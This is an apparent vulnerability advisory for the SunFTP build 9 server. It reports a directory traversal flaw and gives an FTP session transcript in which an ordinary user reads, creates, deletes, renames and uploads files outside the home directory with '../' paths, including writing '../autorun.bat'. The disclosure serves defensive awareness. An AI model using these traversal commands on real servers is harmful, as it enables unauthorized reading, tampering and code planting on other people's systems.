COMMAND
sunftp
SYSTEMS AFFECTED
Sunftp build9(1)
PROBLEM
'se00020' found following. It is possible to break out of the
root directory by using relative paths. e:\crap was used as
homedir of user test.
Getting files from outside of the root dir.
220 chris FTP Server (SunFTP b9) ready on port 21...
Benutzer (10.17.3.44:(none)): test
331 Password required for test.
Kennwort:
230 User test logged in.
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 .
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 ..
-rw-rw-rw- 1 ftp ftp 0 Mar 02 11:21 test.txt
226 File sent ok
FTP: 179 Bytes empfangen in 0,00Sekunden
179000,00KB/s
ftp> cd ..
501 CWD failed. No permission
ftp> get ../sunftptest.txt
200 Port command successful.
150 Opening data connection for ../sunftptest.txt.
226 File sent ok
FTP: 1443 Bytes empfangen in 0,00Sekunden
1443000,00KB/s
Without priviledges to create directories:
ftp> mkdir test
550 '/test': can't create directory.
ftp> mkdir ../test
257 '/../test': directory created.
Without any priviledges to remove anything
ftp> rmdir ../test
250 '/../test': directory removed.
This only works with empty directories
It is possible to rename files outside of the root directory
without permissions. And it is also possible to move files with
the rename command, when the filename is known.
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 .
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 ..
-rw-rw-rw- 1 ftp ftp 0 Mar 02 11:21
grmbl.txt
drw-rw-rw- 1 ftp ftp 0 Mar 02 12:17 test
226 File sent ok
FTP: 240 Bytes empfangen in 0,00Sekunden
240000,00KB/s
ftp> cd ..
501 CWD failed. No permission
ftp> rename ../sunftptest.txt movedtohomedir.txt
350 File exists, ready for destination name.
250 File '/../sunftptest.txt' renamed
to '/movedtohomedir.txt'.
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 .
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 ..
-rw-rw-rw- 1 ftp ftp 0 Mar 02 11:21
grmbl.txt
drw-rw-rw- 1 ftp ftp 0 Mar 02 12:17 test
-rw-rw-rw- 1 ftp ftp 6 Mar 02 12:33
movedtohomedir.txt
226 File sent ok
FTP: 314 Bytes empfangen in 0,00Sekunden
314000,00KB/s
If you have permission to upload files, you can put these files
outside of the homedir.
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 .
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 ..
-rw-rw-rw- 1 ftp ftp 0 Mar 02 11:21
grmbl.txt
drw-rw-rw- 1 ftp ftp 0 Mar 02 12:17 test
-rw-rw-rw- 1 ftp ftp 6 Mar 02 12:33
movedtohomedir.txt
226 File sent ok
FTP: 314 Bytes empfangen in 0,00Sekunden
314000,00KB/s
ftp> put
Lokale Datei c:\test.txt
Remotedatei test.txt
200 Port command successful.
150 Opening data connection for test.txt.
226 File received ok
ftp> put
Lokale Datei c:\test.txt
Remotedatei ../autorun.bat
200 Port command successful.
150 Opening data connection for ../autorun.bat.
226 File received ok
SOLUTION
This project is no loger live...